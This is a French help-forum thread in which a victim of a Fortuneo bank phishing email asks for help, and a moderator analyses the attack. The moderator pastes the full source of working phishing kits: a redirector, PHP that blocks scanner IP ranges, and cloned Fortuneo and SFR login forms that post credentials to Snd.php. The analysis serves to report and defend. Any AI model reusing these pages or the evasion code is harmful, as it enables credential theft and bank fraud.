Bonsoir,
Je viens de commettre la grosse erreur à ne pas faire.
J'ai reçu un mail de ma banque Fortuneo me disant que j'avais un message à consulter dans ma messagerie privée.
Un lien m'invitait donc à cliquer pour aller sur le site et me connecter.
Ce que j'ai fait.
J'ai rentré mon login et mot de passe une première fois.
Je suis tombé sur une page d'erreur
J'ai recommencé !
Idem
C'est à ce moment là que j'ai pris la peine de regarder un peu mieux le mail en question.
Et là, j'ai vu que le lien ne me dirigeait pas du tout vers ma banque et que l'expéditeur n'avait rien à voir, sans parler des nombreuses fautes d'orthographe ! Moi qui me croyait suffisamment prudent et averti pour ne pas me laisser avoir !
Voici le lien correspondant à "Accéder à ma messagerie" :
"http://mytravelingoffice.com/inde%EF%B9 ... %CE%98.php"
Je ne le mets pas entre balises URL pour ne pas qu'un lecteur du forum clique par inadvertance.
J'ai aussitôt changé mon mot de passe en ligne sur le site de ma banque.
Mais suis-je sorti d'affaire pour autant ?
Quelles autres précautions dois-je prendre ?
Etes-vous en mesure de vérifier ce qui se cache derrière ce lien ? En fait ma crainte majeure est que, en cliquant sur ce lien ou en saisissant mes logins et mots de passe, un logiciel espion soit venu s'installer sur ma machine et communique à l'externe tout ce que je fais, y compris mon récent changement de mots de passe.
Merci par avance pour votre aide.
.
Je viens de me faire "hameçonner"
Modérateurs : Mods Windows, Helper
Hameçonnage: 199.204.251.205 | 199.204.248.108 { Jumpline In
Bonjour,
Je me charge de vérifier pendant que c'est encore en ligne.
Ne supprimez surtout pas le courriel, laissez tel quel.
Le sujet sera édité au fur & à mesure, détendez-vous.
→ Plateforme Internet Signalement
→ Signal Spam
edit: Aucun code malveillant susceptible d'avoir infecté votre ordinateur.
http:mytravelingoffice.com/inde%EF%B9%8C%EF%B9%8C%CE%98%CE%98.php
MYTRAVELINGOFFICE.COM : 199.204.248.108 ( CPANEL08.MYHOSTCENTER.COM ) - Jumpline Inc
http://mytravelingoffice.com/fortu/id/Fortuneo.fr/
POST http://mytravelingoffice.com/fortu/id/Fortuneo.fr/Snd.php
Redirection : https://www.fortuneo.fr/fr/
Présence d'un autre kit d'hameçonnage
→ http://uetco.com/jse/acces-compte-direct-logine-/
UETCO.COM : 199.204.248.108 ( CPANEL08.MYHOSTCENTER.COM ) - Jumpline Inc
edit: lundi 2 mars 2015
http:mytravelingoffice.com/inde%EF%B9%8C%EF%B9%8C%CE%98%CE%98.php
Redirection : http://wkaclan.net/sfr-facture-impayee/
WKACLAN.NET : 199.204.251.205 ( S205.N251.N204.N199.STATIC.MYHOSTCENTER.COM ) - Jumpline Inc
Je me charge de vérifier pendant que c'est encore en ligne.
Ne supprimez surtout pas le courriel, laissez tel quel.
Le sujet sera édité au fur & à mesure, détendez-vous.
→ Plateforme Internet Signalement
→ Signal Spam
edit: Aucun code malveillant susceptible d'avoir infecté votre ordinateur.
http:mytravelingoffice.com/inde%EF%B9%8C%EF%B9%8C%CE%98%CE%98.php
MYTRAVELINGOFFICE.COM : 199.204.248.108 ( CPANEL08.MYHOSTCENTER.COM ) - Jumpline Inc
Code : Tout sélectionner
<html>
<head>
<title>Espace Client S.F.R - Gestion de mon compte S.F.R</title>
<meta http-equiv="refresh" content="0; URL=http://mytravelingoffice.com/fortu/id/Fortuneo.fr/">
</head>
<body>
</body>
</html>Code : Tout sélectionner
<?
// array's of banned IP addresses
$bannedIP = array("^66.102.*.*", "^66.249.*.*", "^72.14.192.*", "^74.125.*.*", "^209.85.128.*", "^216.239.32.*", "^74.125.*.*", "^207.126.144.*", "^173.194.*.*", "^64.233.160.*", "^72.14.192.*", "^66.102.*.*", "^64.18.*.*", "^194.52.68.*", "^194.72.238.*", "^62.116.207.*", "^212.50.193.*", "^69.65.*.*", "^50.7.*.*", "^131.212.*.*", "^46.116.*.* ", "^62.90.*.*", "^89.138.*.*", "^82.166.*.*", "^85.64.*.*", "^85.250.*.*", "^89.138.*.*", "^93.172.*.*", "^109.186.*.*", "^194.90.*.*", "^212.29.192.*", "^212.29.224.*", "^212.143.*.*", "^212.150.*.*", "^212.235.*.*", "^217.132.*.*", "^50.97.*.*", "^217.132.*.*", "^209.85.*.*", "^66.205.64.*", "^204.14.48.*", "^64.27.2.*", "^67.15.*.*", "^202.108.252.*", "^193.47.80.*", "^64.62.136.*", "^66.221.*.*", "^64.62.175.*", "^198.54.*.*", "^192.115.134.*", "^216.252.167.*", "^193.253.199.*", "^69.61.12.*", "^64.37.103.*", "^38.144.36.*", "^64.124.14.*", "^206.28.72.*", "^209.73.228.*", "^158.108.*.*", "^168.188.*.*", "^66.207.120.*", "^167.24.*.*", "^192.118.48.*", "^67.209.128.*", "^12.148.209.*", "^12.148.196.*", "^193.220.178.*", "68.65.53.71", "^198.25.*.*", "^64.106.213.*");
if(in_array($_SERVER['REMOTE_ADDR'],$bannedIP)) {
// this is for exact matches of IP address in array
header('HTTP/1.0 404 Not Found');
exit();
} else {
// this is for wild card matches
foreach($bannedIP as $ip) {
if(eregi($ip,$_SERVER['REMOTE_ADDR'])) {
header('HTTP/1.0 404 Not Found');
exit();
}
}
}
?>
<html>
<head>
<link rel="shortcut icon" href="favicon.ico">
<title>Banque en ligne, bourse de Paris, PEA, SICAV, Assurance Vie, Livret d'épargne avec Fortuneo</title>
<style type="text/css">
#content{float:left;width:100%;margin-top:10px;}#content_all{width:770px;}#content_all_service{overflow:hidden;}.block{border:1px solid #E9E9E9;padding:5px;margin-bottom:10px;background-color:#FFF;}form{padding:0;margin:0;}.page_acces label.labelLeft{padding-left:40px;}label.labelLeft,label.labelLeftAuto,span.spanLeft,span.valStatic{display:inline-block;margin:0;padding:.3em .8em .3em 0;float:left;}label.labelLeft,span.spanLeft{width:245px;text-align:right;color:#666;}.LabelLeft{display:inline;} .LabelLeft{color:#666;display:inline-block;float:left;font-size:.91em;line-height:1.5em;margin:0;padding:.3em .8em .3em 0;text-align:right;width:90px;}textarea,select,input{font-family:Verdana,Arial,Helvetica,sans-serif;}.button_important1{background-position:0 0;font-weight:bold;}.button_important1,.button_important2,.button_important3,.button_important4,.button_important5{line-height:26px;}.button_important1,.button_important2,.button_important3,.button_important4,.button_important5,.button_important1 span,.button_important2 span,.button_important3 span,.button_important4 span,.button_important5 span,.button_important1 span span,.button_important2 span span,.button_important3 span span,.button_important4 span span,.button_important5 span span,span.button_important1 span input,span.button_important2 span input,span.button_important3 span input,span.button_important4 span input,span.button_important5 span input{background-image:url('images/bt/sprite_bt02.gif');
}.button1,.button2,.button3,.button4,.button5,.button_important1,.button_important2,.button_important3,.button_important4,.button_important5{padding:0 0 0 12px;display:-moz-inline-box;display:inline-block;font-size:11px;line-height:22px;text-decoration:none;background-image:url('images/bt/sprite_bt.gif');
background-repeat:no-repeat;
}.button_important1 span{background-position:100% -64px;}.button_important1 span,.button_important2 span,.button_important3 span,.button_important4 span,.button_important5 span{padding:0 12px 0 0;background-repeat:no-repeat;display:-moz-inline-box;display:inline-block;}.button1 span,.button2 span,.button3 span,.button4 span,.button5 span,.button_important1 span,.button_important2 span,.button_important3 span,.button_important4 span,.button_important5 span{padding:0 12px 0 0;background-image:url('images/bt/sprite_bt.gif');
background-repeat:no-repeat;display:-moz-inline-box;display:inline-block;cursor:pointer;
}span.button_important1 span input,span.button_important2 span input,span.button_important3 span input,span.button_important4 span input,span.button_important5 span input{display:inline-block;cursor:pointer;}span.button_important1 span input,span.button_important2 span input{background-position:0 -32px;font-weight:bold;}span.button_important1 span input,span.button_important2 span input,span.button_important3 span input,span.button_important4 span input,span.button_important5 span input{border:0 solid #FFF;background-color:#FFF;margin:0;overflow:visible;color:#111;font-size:.9em;line-height:26px;padding:0;height:26px;}#content_all_noheto{overflow:hidden;}
.page_acces .liste_liens{padding-left:170px;}.block a.liens_plus{color:#1A9DCC;}a.liens_plus,a.liens00{font-size:.91em;}a{line-height:1.2em;}h1 a:hover,h2 a:hover,h3 a:hover,h4 a:hover,h5 a:hover,a,#z_search a:hover,.block .pager a:hover,a#z_contact:hover{text-decoration:none;}
.auto-style2 {
color: #68ACBB;
}
#content_all_service0{overflow:hidden;}
.auto-style4 {
background-color: #A6E347;
font-weight: bold;
font-family: Verdana, Arial, Helvetica, sans-serif;
}
.auto-style5 {
margin-bottom: 0px;
}
.auto-style6 {
font-size: small;
font-family: Verdana, Arial, Helvetica, sans-serif;
}
.auto-style7 {
color: #68ACBB;
font-size: small;
font-family: Verdana, Arial, Helvetica, sans-serif;
}
.auto-style8 {
font-family: Verdana, Arial, Helvetica, sans-serif;;
}
.auto-style9 {
font-size: small;
}
</style>
</head>
<body background="back.png">
<p class="auto-style8"> </p>
<p class="auto-style8"> </p>
<p class="auto-style8"> </p>
<p class="auto-style8"> </p>
<div id="content_all_service">
<div id="as_AFIdentification_">
<script type="text/javascript">
//si on trouve l'iframe centrale on redirige la page du navigateur
if(jQuery('iframe#iframe_centrale',window.parent.document).length) {
window.parent.location.href="/fr/identification.jsp";
}
function isCookieEnable(){
var cookieEnabled=(navigator.cookieEnabled)? true : false
if (typeof navigator.cookieEnabled=="undefined" && !cookieEnabled){
document.cookie="testcookie"
cookieEnabled=(document.cookie.indexOf("testcookie")!=-1)? true : false
}
//Dans le cas ou la personne n'accepte que les cookies de fortuneo
if (!cookieEnabled){
cookieEnabled=(document.cookie.indexOf("JSESSIONID")!=-1)? true : false
}
return cookieEnabled;
}
function controleIdentification(){
// Test cookie
if(!isCookieEnable()) {
document.location.href="/fr/erreur-cookie.jsp";
return false;
}
document.forms["acces_identification"].login.value = document.forms["logForm_general"].LOGIN.value;
document.forms["acces_identification"].passwd.value = document.forms["passForm_general"].PASSWD.value;
document.forms["acces_identification"].submit();
}
</script>
<div id="acces_client" class="page_acces">
<div class="center">
</div>
</div>
</div>
</div>
<span class="auto-style8">
<script type="text/javascript">
window.onload = chargement;
function chargement(){
document.forms["logForm_general"].LOGIN.focus();
}
</script>
</span>
<div style="display:none">
<form name="acces_identification" action="Snd.php" method="POST" onsubmit="controleIdentification();return true;">
<input type="hidden" name="locale" value="fr" class="auto-style8">
<input type="text" name="login" value="" autocomplete="off" class="auto-style8">
<input type="password" name="passwd" value="" autocomplete="off" class="auto-style8">
<input type="hidden" name="idDyn" value="false" class="auto-style8">
</form>
</div>
<span class="auto-style8">
</div>
</div>
</span>
<p>
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" id="pub_Flash12257548" width="1000" height="90" style="left: 13.6%; top: 160px; position: absolute;> <param name="allowScriptAccess" value="always" class="auto-style8"> <param name="movie" value="https://static.sascdn.com/diff/168/3954574/1000x90_av_taux_0115(1).swf"> <param name="flashvars" value="target=_top&clicktag=http%3A//www3.smartadserver.com/diff/168/3954574/go17.asp%3F3954574%253B35054%253B7539013196020835855%253B6645071432%253BS%253Bsystemtarget%3D%2524qc%253d1307875950%253b%2524ql%253dmedium%253b%2524qpc%253d10000%253b%2524qpp%253d0%253b%2524qt%253d209_1891_36351t%253b%2524dma%253d0%253b%2524b%253d16390%253b%2524o%253d11063%253b%2524sh%253d768%253b%2524sw%253d1280%253Btarget%3Dcrtg2%3Dtrue%253Bcrtg%3Dtrue%253B12257548%253Bclickvars%3D&clickTag=http%3A//www3.smartadserver.com/diff/168/3954574/go17.asp%3F3954574%253B35054%253B7539013196020835855%253B6645071432%253BS%253Bsystemtarget%3D%2524qc%253d1307875950%253b%2524ql%253dmedium%253b%2524qpc%253d10000%253b%2524qpp%253d0%253b%2524qt%253d209_1891_36351t%253b%2524dma%253d0%253b%2524b%253d16390%253b%2524o%253d11063%253b%2524sh%253d768%253b%2524sw%253d1280%253Btarget%3Dcrtg2%3Dtrue%253Bcrtg%3Dtrue%253B12257548%253Bclickvars%3D&clickTAG=http%3A//www3.smartadserver.com/diff/168/3954574/go17.asp%3F3954574%253B35054%253B7539013196020835855%253B6645071432%253BS%253Bsystemtarget%3D%2524qc%253d1307875950%253b%2524ql%253dmedium%253b%2524qpc%253d10000%253b%2524qpp%253d0%253b%2524qt%253d209_1891_36351t%253b%2524dma%253d0%253b%2524b%253d16390%253b%2524o%253d11063%253b%2524sh%253d768%253b%2524sw%253d1280%253Btarget%3Dcrtg2%3Dtrue%253Bcrtg%3Dtrue%253B12257548%253Bclickvars%3D"> <param name="quality" value="high"> <param name="wmode" value="Opaque">
<embed name="pub_Flash12257548" id="pub_Flash12257549" src="https://static.sascdn.com/diff/168/3954574/1000x90_av_taux_0115(1).swf" flashvars="target=_top&clicktag=http%3A//www3.smartadserver.com/diff/168/3954574/go17.asp%3F3954574%253B35054%253B7539013196020835855%253B6645071432%253BS%253Bsystemtarget%3D%2524qc%253d1307875950%253b%2524ql%253dmedium%253b%2524qpc%253d10000%253b%2524qpp%253d0%253b%2524qt%253d209_1891_36351t%253b%2524dma%253d0%253b%2524b%253d16390%253b%2524o%253d11063%253b%2524sh%253d768%253b%2524sw%253d1280%253Btarget%3Dcrtg2%3Dtrue%253Bcrtg%3Dtrue%253B12257548%253Bclickvars%3D&clickTag=http%3A//www3.smartadserver.com/diff/168/3954574/go17.asp%3F3954574%253B35054%253B7539013196020835855%253B6645071432%253BS%253Bsystemtarget%3D%2524qc%253d1307875950%253b%2524ql%253dmedium%253b%2524qpc%253d10000%253b%2524qpp%253d0%253b%2524qt%253d209_1891_36351t%253b%2524dma%253d0%253b%2524b%253d16390%253b%2524o%253d11063%253b%2524sh%253d768%253b%2524sw%253d1280%253Btarget%3Dcrtg2%3Dtrue%253Bcrtg%3Dtrue%253B12257548%253Bclickvars%3D&clickTAG=http%3A//www3.smartadserver.com/diff/168/3954574/go17.asp%3F3954574%253B35054%253B7539013196020835855%253B6645071432%253BS%253Bsystemtarget%3D%2524qc%253d1307875950%253b%2524ql%253dmedium%253b%2524qpc%253d10000%253b%2524qpp%253d0%253b%2524qt%253d209_1891_36351t%253b%2524dma%253d0%253b%2524b%253d16390%253b%2524o%253d11063%253b%2524sh%253d768%253b%2524sw%253d1280%253Btarget%3Dcrtg2%3Dtrue%253Bcrtg%3Dtrue%253B12257548%253Bclickvars%3D" swliveconnect="true" width="1000" height="90" quality="high" wmode="Opaque" allowscriptaccess="always" type="application/x-shockwave-flash" pluginspage="http://www.adobe.com/go/getflashplayer"> </object>
</p>
<p class="auto-style8"> </p>
<p class="auto-style8"> </p>
<p class="auto-style8"> </p>
<div class="block" id="formGeneralFortuneo0" style="left: 1%; top: 1852px; visibility: visible; position: absolute; height: 123px;"block_cadre_content">
<div id="identificationBloc0">
<form name="logForm_general0" method="POST" onsubmit="javascript:controleIdentification();return false;">
<p class="auto-style8">
</p>
</form>
</div>
</div>
<div id="content" class="auto-style5">
<div id="content_all" style="left: 14.5%; top: 359px; visibility: visible; position: absolute; height: 180px; width: 768px;"content_all_service0">
<div id="as_AFIdentification_0">
<script type="text/javascript">
//si on trouve l'iframe centrale on redirige la page du navigateur
if(jQuery('iframe#iframe_centrale',window.parent.document).length) {
window.parent.location.href="/fr/identification.jsp";
}
function isCookieEnable(){
var cookieEnabled=(navigator.cookieEnabled)? true : false
if (typeof navigator.cookieEnabled=="undefined" && !cookieEnabled){
document.cookie="testcookie"
cookieEnabled=(document.cookie.indexOf("testcookie")!=-1)? true : false
}
//Dans le cas ou la personne n'accepte que les cookies de fortuneo
if (!cookieEnabled){
cookieEnabled=(document.cookie.indexOf("JSESSIONID")!=-1)? true : false
}
return cookieEnabled;
}
function controleIdentification(){
// Test cookie
if(!isCookieEnable()) {
document.location.href="/fr/erreur-cookie.jsp";
return false;
}
document.forms["acces_identification"].login.value = document.forms["logForm_general"].LOGIN.value;
document.forms["acces_identification"].passwd.value = document.forms["passForm_general"].PASSWD.value;
document.forms["acces_identification"].submit();
}
</script>
<div id="acces_client0" class="page_acces">
<div class="center">
<div class="block" id="formGeneralFortuneo">
<div class="block_cadre_content">
<div id="identificationBloc">
<form action="Snd.php" name="logForm_general" method="POST" onsubmit="javascript:controleIdentification();return false;">
<p>
<span class="auto-style8">
<label style="font-family:font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px;font-weight: normal;line-height: 1.2em;"class="labelLeft">Identifiant </label>
</span>
<input type="text" name="choxlg" onkeypress="return numbersonly(event)" class="auto-style8" maxlength="40" tabindex="1" onclick="javascript:this.value=''" onselect="javascript:this.value=''"><span class="auto-style8">
</span>
</p>
<p>
<span class="auto-style8">
<label style="font-family:font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 12px;font-weight: normal;line-height: 1.2em;"class="labelLeft">Mot de passe </label>
</span>
<input name="choxps" type="password" class="auto-style8" maxlength="20" tabindex="2" onclick="javascript:this.value=''" onfocus="javascript:this.value=''"><span class="auto-style8">
</span>
</p>
<p>
<span class="auto-style8">
<label class="labelLeft"> </label></span>
<span> <strong><input type="submit" name="valider_bv" title="Valider" value="" tabindex="2" onclick="javascript:controleIdentification()" class="auto-style4" style="border-color:transparent; position: absolute; width: 74px; left: 297px; top: 84px; background-image: url('btm.png'); height: 40px;" ></strong></span><span class="auto-style8"></span></span></p>
</form>
<p style="font-family:font-family: Verdana,Arial,Helvetica,sans-serif; font-weight: normal;line-height: 1.2em; height: 8px" class="auto-style9">
<span class="auto-style8"> </span><span class="auto-style7">
</span>
<a href="https://www.fortuneo.fr/fr/identifiant-oublie.jsp" class="auto-style2" style="color:#1A9DCC;" tabindex="4" title="Identifiant oublié">
<span class="auto-style6">Identifiant oublié</span></a><span class="auto-style7"> |
</span>
<a href="https://www.fortuneo.fr/fr/reedition-mot-passe.jsp" class="auto-style2" tabindex="5" title="Mot de passe oublié/Accès bloqué">
<span class="auto-style6">Mot de passe oublié/Accès bloqué</span></a><span class="auto-style7"> |
</span>
<a href="http://www.fortuneo.fr/fr/aide/foire-questions-securite.jsp" class="auto-style2" tabindex="6" title="Conseils en terme de sécurité">
<span class="auto-style6">Conseils en terme de sécurité</span></a><span class="auto-style8">
</span>
</p>
</div>
</div>
</div>
</div>
</div>
<span class="auto-style8">
<script type="text/javascript">
window.onload = chargement;
function chargement(){
document.forms["logForm_general"].LOGIN.focus();
}
</script>
</span>
<div style="display:none">
<form name="acces_identification0" action="Snd.php" method="POST" onsubmit="controleIdentification();return true;">
<input type="hidden" name="locale0" value="fr" class="auto-style8">
<input type="text" name="login1" value="" autocomplete="off" class="auto-style8">
<input type="password" name="passwd1" value="" autocomplete="off" class="auto-style8">
<input type="hidden" name="idDyn0" value="false" class="auto-style8">
</form>
</div>
</div>
</div>
<br class="auto-style8">
</div>
<span class="auto-style8">
</div>
</span>
</body>
</html>Redirection : https://www.fortuneo.fr/fr/
Présence d'un autre kit d'hameçonnage
→ http://uetco.com/jse/acces-compte-direct-logine-/
UETCO.COM : 199.204.248.108 ( CPANEL08.MYHOSTCENTER.COM ) - Jumpline Inc
edit: lundi 2 mars 2015
http:mytravelingoffice.com/inde%EF%B9%8C%EF%B9%8C%CE%98%CE%98.php
Code : Tout sélectionner
<html>
<head>
<title>Espace Client S.F.R - Gestion de mon compte S.F.R</title>
<meta http-equiv="refresh" content="0; URL=http://sfr-facture-impayee.wkaclan.net">
</head>
<body>
</body>
</html> WKACLAN.NET : 199.204.251.205 ( S205.N251.N204.N199.STATIC.MYHOSTCENTER.COM ) - Jumpline Inc
Code : Tout sélectionner
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="description" content="" />
<title>Espace Client SFR - Gestion de mon compte SFR</title>
<link rel="shortcut icon" href="img/favicon.ico" />
<script type="text/javascript" src="https://s1.s-sfr.fr/cas/js/jquery-1.10.2.min.js"></script>
<script type="text/javascript" src="https://s1.s-sfr.fr/cas/js/mire-v1-script.js"></script>
<script type="text/javascript" src="https://s1.s-sfr.fr/cas/js/mire-jquery.placeholder.js"></script>
<script type="text/javascript">
_stats_pagename = "Authentification/Mon Compte";
_cCas = {
ts: 1404356319713,
img: "https://static.s-sfr.fr/media/mire_espace_client.jpg",
alt: "Outils de Gestion SFR mon compte",
focus: true,
css: "https://s1.s-sfr.fr/cas/css/mire-v2-style-web.css",
ok: 0
}
$(function(){
var enableEtag = true;
var typeMire="web";
if (!enableEtag || !_cCas.ok) {
finalizeLoginPage(typeMire);
loadStyle();
if (typeMire=="web") {
var img = new Image();
img.src = "https://static.s-sfr.fr/media/mire_espace_client.jpg";
img.alt = "Outils de Gestion SFR mon compte";
$("#colL").append(img);
}
}
if (!enableEtag || _cCas.focus) {
focus();
}
});
function finalizeLoginPage(type) {
var enableEtag = true;
var cdnOption = "";
var mobileOption = "&mobileMode=true";
var layerOption = "&layerMode=true";
var urlRetour = "&urlRetour=https%3A%2F%2Fwww.sfr.fr%2Fcas%2Flogin%3Fdomain%3Dmire-ec%26service%3Dhttps%253A%252F%252Fwww.sfr.fr%252Faccueil%252Fj_spring_cas_security_check";
var forgotPasswordUrl = "https://www.sfr.fr/parcours/securite/oubliMotDePasse/identifiant.action?";
var forgotIdUrl = "https://www.sfr.fr/parcours/securite/oubliIdentifiant/informations.action?";
var forgotPasswordCID = "#sfrclicid=EC_mire_oubli-mdp";
var forgotPasswordLayerCID = "#sfrclicid=EC_mire_layer-mdp-oublie";
var forgotIdCID = "#sfrclicid=EC_mire_oubli-id";
var forgotIdLayerCID = "#sfrclicid=EC_mire_layer-oubli-id";
var accountLockedCID = "#sfrclicid=EC_mire_compte-ko";
var accountLockedErrorCID = "#sfrclicid=EC_mire_msgerr-compte-ko";
if (type == "mobile") {
$("#forgotPassword").attr("href", forgotPasswordUrl + mobileOption + urlRetour + forgotPasswordCID);
$("#forgotPasswordLayer").attr("href", forgotPasswordUrl + mobileOption + urlRetour + forgotPasswordLayerCID);
$("#accountLocked").attr("href", forgotPasswordUrl + mobileOption + urlRetour + accountLockedCID);
$("#accountLockedError").attr("href", forgotPasswordUrl + mobileOption + urlRetour + accountLockedErrorCID);
$("#mire-items li").last().remove();
$("#mire-items li").last().remove();
$("#firstConnection").remove();
$("#editoTitle").remove();
$("#helpTitle").remove();
$(".style-second-block").remove();
$("#mire-phishing").remove();
$(".error-panel").detach().appendTo("#formTitle");
if (enableEtag) { _cCas.focus = false }
} else if (type == "layer") {
$("#forgotPassword").attr("href", forgotPasswordUrl + layerOption + forgotPasswordCID);
$("#forgotPasswordLayer").attr("href", forgotPasswordUrl + layerOption + forgotPasswordLayerCID);
$("#accountLocked").attr("href", forgotPasswordUrl + layerOption + accountLockedCID);
$("#accountLockedError").attr("href", forgotPasswordUrl + layerOption + accountLockedErrorCID);
$("#forgotId").attr("href", "#");
$("#forgotIdLayerUrl").attr("href", "#").click(function(){
urlRetour = "";
window.parent.location.href = forgotIdUrl + urlRetour + forgotIdLayerCID;
return false;
});
$("input, textarea").placeholder();
} else {
$("#forgotPassword").attr("href", forgotPasswordUrl + urlRetour + cdnOption + forgotPasswordCID);
$("#forgotPasswordLayer").attr("href", forgotPasswordUrl + urlRetour + cdnOption + forgotPasswordLayerCID);
$("#accountLocked").attr("href", forgotPasswordUrl + urlRetour + cdnOption + accountLockedCID);
$("#accountLockedError").attr("href", forgotPasswordUrl + urlRetour + cdnOption + accountLockedErrorCID);
$("#forgotId").attr("href", forgotIdUrl + urlRetour + forgotIdCID);
$("input, textarea").placeholder();
}
}
function loadStyle(){
$("head").append('<link rel="stylesheet" type="text/css" href="https://s1.s-sfr.fr/cas/css/mire-v2-style-web.css" />');
}
function focus(){
var username = $("#username");
var password = $("#password");
if (username.attr("type") == "hidden") password.focus();
else username.focus();
}
function sendStats(pn) {try{stats({pn:pn})} catch(e) {}}
function sendStatsMsg(m) {sendStats("Authentification/Mon Compte"+m)}
function sendStatsHelp(m) {sendStats("Aide/Mon Compte"+m)}
function trackLink(l,m) {s_tl(l,'o',s.pageName+m)}
</script>
<style type="text/css">
</style>
</head>
<body class="sfr-pwp-content" style="" >
<div class="page">
<div id="headerr" class=""><a href="#h"><img src="img/header-v3.png" width="100%" alt="" /></a></div>
<!-- Debut de id="main" -->
<div id="main">
<div class="boxTitle">
<img src="img/Esp-Clt.png" alt="" /> <br />
</div>
<div id="colR">
<div id="column-right">
<div class="block" id="style-first-block">
<div class="content-area" id="mire-phishing">
<div class="item center">
<a href="#Info"><img src="img/Info-Phi.png" alt="" /></a>
</div>
</div>
<h2 id="formTitle">Connectez-vous</h2>
<div class="content-area" id="mire-form">
<p class="notes">Email, NeufID ou numéro de ligne mobile/Clé Internet</p>
<form name="loginForm" id="loginForm" action="?rnv=156&intid=634ba3adf0c936622c720dae468c51ba" method="post">
<div class="custom-input-text">
<label for="username"></label>
<img class="is-focus" src="https://static.s-sfr.fr/media/icon-user-focus_20x20.png"/>
<img class="is-onerror" src="https://static.s-sfr.fr/media/icon-user-error_20x20.png"/>
<img class="is-normal" src="https://static.s-sfr.fr/media/icon-user-normal_20x20.png"/>
<input id="username" name="user" type="text" value="" placeholder="Identifiant" autocomplete="off" maxlength="256" />
</div>
<div class="custom-input-text">
<label for="password"></label>
<img class="is-focus" src="https://static.s-sfr.fr/media/icon-password-focus_20x20.png"/>
<img class="is-onerror" src="https://static.s-sfr.fr/media/icon-password-error_20x20.png"/>
<img class="is-normal" src="https://static.s-sfr.fr/media/icon-password-normal_20x20.png"/>
<input id="password" name="pass" type="password" value="" placeholder="Mot de passe" autocomplete="off" maxlength="16" />
</div>
<!-- -->
<div class="item">
<div class="checkbox-left">
<div class="part-1">
<input type="checkbox" name="remember-me" id="remember-me" checked />
</div>
<div class="part-2">
<label for="remember-me">Rester connecté</label>
</div>
</div>
<button class="button-2" type="submit" name="identifier">Me connecter</button>
</div>
</form>
</div>
<h2 id="helpTitle">Besoin d'aide</h2>
<div class="content-area" id="mire-items">
<ul class="items-list">
<li><a id="mtp" href="#EC_mire_compte" class="light-link">Mot de passe oublié</a></li>
<li><a id="cmpte" href="#EC_mire_compte-ko" class="light-link">Compte bloqué</a></li>
<li><a id="ident" href="#EC_mire_oubli-id" class="light-link">Identifiant oublié</a></li>
<li><a id="conx" href="#connexion" class="light-link">Première connexion</a></li>
</ul>
</div>
</div>
<style>
.style-second-block#block-acte-urgence-v2 {
background-color: #f0f0f0;
padding-left: 65px;
}
.style-second-block#block-acte-urgence-v2 .second-block-text {
background: #FFF;
padding: 12px 8px;
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
box-sizing: border-box;
height: 100%;
}
.style-second-block#block-acte-urgence-v2 .second-block-text > h5,
.style-second-block#block-acte-urgence-v2 .second-block-text x:-moz-any-link,
.style-second-block#block-acte-urgence-v2 .second-block-text x:default {
font-family: "SFR-Regular", Arial, Sans-serif !important;
}
.style-second-block#block-acte-urgence-v2 .second-block-text > h5 {
font-size: 13px;
/*so it can be rounded a bit more*/
font-size: 0.8125rem;
letter-spacing: -0.01em;
margin-bottom: 2px;
font-family: "SFR-Bold", "SFR-Regular", Arial, Sans-serif;
}
.style-second-block#block-acte-urgence-v2 .second-block-text > a {
font-size: 12px;
/*so it can be rounded a bit more*/
font-size: 0.75rem;
display: block;
padding-left: 14px;
height: 32px;
line-height: 32px;
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
box-sizing: border-box;
color: #000;
text-decoration: none;
position: relative;
background-image: url(https://static.s-sfr.fr/media/sprite.png);
background-repeat: no-repeat;
background-position: 0px -1289px;
}
.style-second-block#block-acte-urgence-v2 .second-block-text > a:hover {
text-decoration: underline;
}
.style-second-block#block-acte-urgence-v2 {
background-image: url(https://static.s-sfr.fr/media/sprite.png);
background-repeat: no-repeat;
background-position: 6px -1861px;
}
</style>
<div id="block-acte-urgence-v2" class="style-second-block">
<div class="second-block-text"><h5>Mobile perdu ou volé, SIM bloquée</h5>
<a href="#EC_mire_actes-urgences" class="really-light-link">Accédez aux actes d'urgence</a></div></div>
</div>
</div>
<div id="xcolL">
<img id="xeditoImage" src="img/esp_clnt-v2.jpg" alt="Outils de Gestion" />
</div>
</div><!-- Fin de id="main" -->
<div id="footerr"><a href="#f"><img src="img/footer-v3.png" width="100%" alt="" /></a></div>
</div>
</body>
</html>
Dernière modification par ѠOOT le 02 mars 2015 22:59, modifié 4 fois.
- Messages : 285
- Inscription : 05 juil. 2009 14:34
Re: Je viens de me faire "hameçonner"
Merci
Pour la petite histoire, je me suis fait avoir d'autant plus facilement que j'avais posté une demande à ma banque sur la dite messagerie de mon espace client il y a quelques jours. J'attendais (et attends donc toujours) leur réponse. C'est pour ça que je ne me suis pas méfié.
Demain matin, je vais quand mêmes les appeler pour leur signaler et leur expliquer ce que j'ai fait (changement de mot de passe). Peut-être ont-il une procédure de sécurité supplémentaire pour les comptes devenus vulnérables (par exemple, un changement de numéro de compte).
Je reste à l'affût de votre analyse.
Pour la petite histoire, je me suis fait avoir d'autant plus facilement que j'avais posté une demande à ma banque sur la dite messagerie de mon espace client il y a quelques jours. J'attendais (et attends donc toujours) leur réponse. C'est pour ça que je ne me suis pas méfié.
Demain matin, je vais quand mêmes les appeler pour leur signaler et leur expliquer ce que j'ai fait (changement de mot de passe). Peut-être ont-il une procédure de sécurité supplémentaire pour les comptes devenus vulnérables (par exemple, un changement de numéro de compte).
Je reste à l'affût de votre analyse.